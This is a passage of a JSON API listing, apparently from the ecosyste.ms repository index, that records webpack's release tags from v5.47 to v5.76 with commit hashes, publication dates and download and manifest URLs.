6.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5